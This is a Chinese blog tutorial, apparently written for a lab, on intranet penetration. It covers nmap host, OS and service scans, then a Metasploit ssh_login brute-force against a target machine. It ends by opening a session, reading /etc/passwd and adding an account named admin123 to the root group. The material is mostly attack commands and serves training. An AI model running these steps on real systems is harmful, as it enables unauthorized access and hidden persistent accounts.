内网渗透之扫描与SSH暴力破解

博主：逍遥
发布时间：2019 年 01 月 09 日
85 次浏览
暂无评论
758字数
分类：信息安全

扫描局域网存活主机

注意：以下使用的ip地址为我部署的环境网段，如果你在看本文，请灵活的进行学习以及使用。目标主机=靶机

nmap -sP 192.168.1.0/24

扫描靶机的操作系统以及版本号

nmap -O 192.168.1.111

扫描靶机的应用程序以及应用程序的版本号

nmap -sV 192.168.1.111

利用msf ssh_login模块暴力破解靶机ssh密码

先打开MSF 进入ssh_login模块 show options查看提示

使用ssh_login模块

use auxiliary/scanner/ssh/ssh_login

设定靶机IP

set RHOSTS 192.168.1.111

设置账号文件/设置账号

你可以设置账号，但是只尝试这一个，建议你使用账号文件

#设置账号
set USERNAME root

#设置账号文件
set USER_FILE 密码文件

设置密码文件/设置密码

你可以设置密码，但是只尝试这一个，建议你使用密码文件

#设置密码
set PASSWORD 123456

#设置密码文件
set PASS_FILE 密码文件

运行

你既可以使用run也可以使用exploit

会话

查询会话方面的信息

sessions -i

打开会话

#打开id为1的会话 输入ifconfig查询ip 成功
sessions -i 1

查看密码文件

cat /etc/passwd

添加用户设置密码并添加到root组

useradd admin123
passwd admin123
usermod -g root admin123

最后修改：2024 年 09 月 02 日

© 允许规范转载

如果觉得我的文章对你有用，请随意赞赏

发表评论取消回复
使用cookie技术保留您的个人信息以便您下次快速评论，继续评论表示您已同意该条款

评论 *

私密评论

名称 *

🎲

邮箱 *

地址

内网渗透之扫描与SSH暴力破解

逍遥 • 2019 年 01 月 09 日

<h2 id="扫描局域网存活主机">扫描局域网存活主机</h2><blockquote>注意：以下使用的ip地址为我部署的环境网段，如果你在看本文，请灵活的进行学习以及使用。目标主机=靶机</blockquote><pre class="prettyprint lang-bsh linenums:1">nmap -sP 192.168.1.0/24</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/96093319-file_1490327346723_10680.jpg" alt=""  style=""></p><h2 id="扫描靶机的操作系统以及版本号">扫描靶机的操作系统以及版本号</h2><pre class="prettyprint lang-bsh linenums:1">nmap -O 192.168.1.111</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/40614354-file_1490327369834_18284.jpg" alt=""  style=""></p><h2 id="扫描靶机的应用程序以及应用程序的版本号">扫描靶机的应用程序以及应用程序的版本号</h2><pre class="prettyprint lang-bsh linenums:1">nmap -sV 192.168.1.111</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/54779058-file_1490327389507_a61f.jpg" alt=""  style=""></p><h2 id="利用msf-ssh-login模块暴力破解靶机ssh密码">利用msf ssh_login模块暴力破解靶机ssh密码</h2><blockquote>先打开MSF 进入ssh_login模块 show options查看提示</blockquote><h3 id="使用ssh-login模块">使用ssh_login模块</h3><pre class="prettyprint lang-bsh linenums:1">use auxiliary/scanner/ssh/ssh_login</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/90482947-file_1490327408809_b9ae.jpg" alt=""  style=""></p><h3 id="设定靶机IP">设定靶机IP</h3><pre class="prettyprint lang-bsh linenums:1">set RHOSTS 192.168.1.111</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/64486092-file_1490327427850_11fe3.jpg" alt=""  style=""></p><h3 id="设置账号文件-设置账号">设置账号文件/设置账号</h3><blockquote>你可以设置账号，但是只尝试这一个，建议你使用账号文件</blockquote><pre class="prettyprint lang-bsh linenums:1">#设置账号
set USERNAME root</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/56494314-file_1490327443624_3cd0.jpg" alt=""  style=""></p><pre class="prettyprint lang-bsh linenums:1">#设置账号文件
set USER_FILE 密码文件</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-25/87558281-file_1490419357684_6303.jpg" alt=""  style=""></p><h3 id="设置密码文件-设置密码">设置密码文件/设置密码</h3><blockquote>你可以设置密码，但是只尝试这一个，建议你使用密码文件</blockquote><pre class="prettyprint lang-bsh linenums:1">#设置密码
set PASSWORD 123456</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/55809518-file_1490327454885_a116.jpg" alt=""  style=""></p><pre class="prettyprint lang-bsh linenums:1">#设置密码文件
set PASS_FILE 密码文件</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/11739275-file_1490327470545_34c8.jpg" alt=""  style=""></p><h3 id="运行">运行</h3><p>你既可以使用<code>run</code>也可以使用<code>exploit</code></p><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/30613753-file_1490327485696_10482.jpg" alt=""  style=""></p><h2 id="会话">会话</h2><h3 id="查询会话方面的信息">查询会话方面的信息</h3><pre class="prettyprint lang-bsh linenums:1">sessions -i</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/93326492-file_1490327503963_b45f.jpg" alt=""  style=""></p><h3 id="打开会话">打开会话</h3><pre class="prettyprint lang-bsh linenums:1">#打开id为1的会话 输入ifconfig查询ip 成功
sessions -i 1</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/99880742-file_1490327513640_71ea.jpg" alt=""  style=""></p><h3 id="查看密码文件">查看密码文件</h3><pre class="prettyprint lang-bsh linenums:1">cat /etc/passwd</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/1181312-file_1490327531867_d381.jpg" alt=""  style=""></p><h3 id="添加用户设置密码并添加到root组">添加用户设置密码并添加到root组</h3><pre class="prettyprint lang-bsh linenums:1">useradd admin123
passwd admin123
usermod -g root admin123</pre><p><img src="http://xiaoyaoblog.hacka.cc/17-3-24/2726030-file_1490327547651_a7.jpg" alt=""  style=""></p>